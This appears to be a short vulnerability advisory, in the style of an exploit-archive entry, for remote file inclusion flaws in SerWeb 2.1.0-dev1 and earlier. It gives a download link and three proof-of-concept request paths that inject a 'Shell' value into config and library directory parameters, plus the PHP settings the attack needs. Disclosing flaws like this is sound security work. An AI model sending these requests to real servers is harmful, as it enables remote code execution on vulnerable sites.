SerWeb versions 2.1.0-dev1 and below suffer from multiple remote file inclusion vulnerabilities.
711dc04a927a02d0e27a65df20f1cd0e13c36c5785979a3ca1030c9d9ac9156f
SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/
POC:
/load_lang.php?_SERWEB[configdir]=Shell
/main_prepend.php?_SERWEB[functionsdir]=Shell
/load_phplib.php?_PHPLIB[libdir]=Shell
Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off